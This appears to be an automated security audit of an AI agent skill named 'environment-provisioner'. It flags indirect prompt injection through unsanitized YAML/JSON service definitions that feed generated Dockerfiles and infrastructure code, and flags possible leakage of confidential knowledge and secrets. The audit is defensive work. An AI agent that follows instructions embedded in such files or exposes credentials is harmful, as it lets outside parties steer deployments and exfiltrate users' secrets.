environment-provisioner
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCREDENTIALS_UNSAFECOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
- Indirect Prompt Injection (HIGH): The skill ingests untrusted data from YAML/JSON service definition files. • Ingestion points: 'input' argument (path to service definition). • Boundary markers: None specified; the agent is expected to interpret the file content directly. • Capability inventory: Generates Dockerfiles, Terraform, and K8s manifests—files intended for execution or deployment. • Sanitization: No evidence of sanitization or validation of the input content before interpolation into IaC templates.
- Data Exposure (HIGH): The 'Knowledge Protocol' section explicitly states the skill integrates 'Confidential (Company/Client)' and 'Personal' knowledge tiers and prioritizes 'secrets'. This indicates the skill is designed to access and potentially leak sensitive context or credentials during the generation process.
- Dynamic Execution (MEDIUM): While the skill doesn't execute code directly in the provided files, its primary function is the generation of executable scripts (Dockerfiles, IaC), which facilitates downstream execution of potentially malicious code if the generation logic is compromised.
Recommendations
- AI detected serious security threats
Audit Metadata